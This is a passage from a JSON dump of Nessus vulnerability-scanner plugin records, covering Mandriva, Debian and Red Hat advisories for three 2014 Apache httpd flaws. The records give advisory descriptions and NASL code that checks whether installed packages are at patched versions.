"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:40", "description": "Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\napache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the DEFLATE\ninput filter). A remote attacker able to send a request whose body\nwould be decompressed could use this flaw to consume an excessive\namount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely (CVE-2014-0231).", "edition": 26, "published": "2014-07-31T00:00:00", "title": "Mandriva Linux Security Advisory : apache (MDVSA-2014:142)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-31T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:apache-mod_suexec", "p-cpe:/a:mandriva:linux:apache-mpm-worker", "p-cpe:/a:mandriva:linux:apache-mod_ssl", "p-cpe:/a:mandriva:linux:apache-mod_ldap", "p-cpe:/a:mandriva:linux:apache-mpm-event", "p-cpe:/a:mandriva:linux:apache-htcacheclean", "p-cpe:/a:mandriva:linux:apache-devel", "p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi", "p-cpe:/a:mandriva:linux:apache-mod_dav", "p-cpe:/a:mandriva:linux:apache-doc", "p-cpe:/a:mandriva:linux:apache-mod_dbd", "p-cpe:/a:mandriva:linux:apache-mod_mem_cache", "p-cpe:/a:mandriva:linux:apache-mod_proxy", "p-cpe:/a:mandriva:linux:apache-mpm-peruser", "p-cpe:/a:mandriva:linux:apache-mod_file_cache", "p-cpe:/a:mandriva:linux:apache-mod_authn_dbd", "p-cpe:/a:mandriva:linux:apache-source", "p-cpe:/a:mandriva:linux:apache-mod_deflate", "p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp", "p-cpe:/a:mandriva:linux:apache-mod_disk_cache", "p-cpe:/a:mandriva:linux:apache-mod_reqtimeout", "p-cpe:/a:mandriva:linux:apache-mpm-itk", "p-cpe:/a:mandriva:linux:apache", "p-cpe:/a:mandriva:linux:apache-mpm-prefork", "p-cpe:/a:mandriva:linux:apache-mod_cache", "p-cpe:/a:mandriva:linux:apache-mod_userdir"], "id": "MANDRIVA_MDVSA-2014-142.NASL", "href": "https://www.tenable.com/plugins/nessus/76923", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:142. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76923);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"MDVSA\", value:\"2014:142\");\n\n script_name(english:\"Mandriva Linux Security Advisory : apache (MDVSA-2014:142)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated apache package fixes security vulnerabilities :\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\napache user (CVE-2014-0226).\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the DEFLATE\ninput filter). A remote attacker able to send a request whose body\nwould be decompressed could use this flaw to consume an excessive\namount of system memory and CPU on the target system (CVE-2014-0118).\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely (CVE-2014-0231).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0304.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-htcacheclean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_authn_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_dbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_deflate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_disk_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_file_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_mem_cache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_ajp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_proxy_scgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_reqtimeout\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_userdir\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-itk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-peruser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-devel-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-doc-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-htcacheclean-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_authn_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dav-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_dbd-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_deflate-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_disk_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_file_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ldap-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_mem_cache-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_ajp-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_proxy_scgi-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_reqtimeout-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_ssl-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_suexec-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mod_userdir-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-event-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-itk-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-peruser-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-prefork-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"apache-mpm-worker-2.2.27-1.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"apache-source-2.2.27-1.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:48:41", "description": "Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118\n The DEFLATE input filter (inflates request bodies) in\n mod_deflate allows remote attackers to cause a denial of\n service (resource consumption) via crafted request data\n that decompresses to a much larger size.\n\n - CVE-2014-0226\n A race condition was found in mod_status. An attacker\n able to access a public server status page on a server\n could send carefully crafted requests which could lead\n to a heap buffer overflow, causing denial of service,\n disclosure of sensitive information, or potentially the\n execution of arbitrary code.\n\n - CVE-2014-0231\n A flaw was found in mod_cgid. If a server using mod_cgid\n hosted CGI scripts which did not consume standard input,\n a remote attacker could cause child processes to hang\n indefinitely, leading to denial of service.", "edition": 15, "published": "2014-07-26T00:00:00", "title": "Debian DSA-2989-1 : apache2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:apache2"], "id": "DEBIAN_DSA-2989.NASL", "href": "https://www.tenable.com/plugins/nessus/76844", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2989. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76844);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_bugtraq_id(68678, 68742, 68745);\n script_xref(name:\"DSA\", value:\"2989\");\n\n script_name(english:\"Debian DSA-2989-1 : apache2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several security issues were found in the Apache HTTP server.\n\n - CVE-2014-0118\n The DEFLATE input filter (inflates request bodies) in\n mod_deflate allows remote attackers to cause a denial of\n service (resource consumption) via crafted request data\n that decompresses to a much larger size.\n\n - CVE-2014-0226\n A race condition was found in mod_status. An attacker\n able to access a public server status page on a server\n could send carefully crafted requests which could lead\n to a heap buffer overflow, causing denial of service,\n disclosure of sensitive information, or potentially the\n execution of arbitrary code.\n\n - CVE-2014-0231\n A flaw was found in mod_cgid. If a server using mod_cgid\n hosted CGI scripts which did not consume standard input,\n a remote attacker could cause child processes to hang\n indefinitely, leading to denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/apache2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2989\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the apache2 packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 2.2.22-13+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"apache2\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-dbg\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-doc\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-event\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-itk\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-prefork\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-mpm-worker\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-prefork-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-suexec-custom\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-threaded-dev\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2-utils\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-bin\", reference:\"2.2.22-13+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"apache2.2-common\", reference:\"2.2.22-13+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-25T09:15:21", "description": "Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.", "edition": 24, "published": "2014-07-24T00:00:00", "title": "RHEL 5 / 6 : httpd (RHSA-2014:0920)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0231", "CVE-2014-0118", "CVE-2014-0226"], "modified": "2014-07-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-devel"], "id": "REDHAT-RHSA-2014-0920.NASL", "href": "https://www.tenable.com/plugins/nessus/76749", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0920. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76749);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2014-0118\", \"CVE-2014-0226\", \"CVE-2014-0231\");\n script_xref(name:\"RHSA\", value:\"2014:0920\");\n\n script_name(english:\"RHEL 5 / 6 : httpd (RHSA-2014:0920)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe httpd packages provide the Apache HTTP Server, a powerful,\nefficient, and extensible web server.\n\nA race condition flaw, leading to heap-based buffer overflows, was\nfound in the mod_status httpd module. A remote attacker able to access\na status page served by mod_status on a server using a threaded\nMulti-Processing Module (MPM) could send a specially crafted request\nthat would cause the httpd child process to crash or, possibly, allow\nthe attacker to execute arbitrary code with the privileges of the\n'apache' user. (CVE-2014-0226)\n\nA denial of service flaw was found in the way httpd's mod_deflate\nmodule handled request body decompression (configured via the\n'DEFLATE' input filter). A remote attacker able to send a request\nwhose body would be decompressed could use this flaw to consume an\nexcessive amount of system memory and CPU on the target system.\n(CVE-2014-0118)\n\nA denial of service flaw was found in the way httpd's mod_cgid module\nexecuted CGI scripts that did not read data from the standard input. A\nremote attacker could submit a specially crafted request that would\ncause the httpd child process to hang indefinitely. (CVE-2014-0231)\n\nAll httpd users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. After\ninstalling the updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0920\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0226\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0920\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"httpd-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-debuginfo-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"httpd-devel-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"httpd-manual-2.2.3-87.el5_10\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 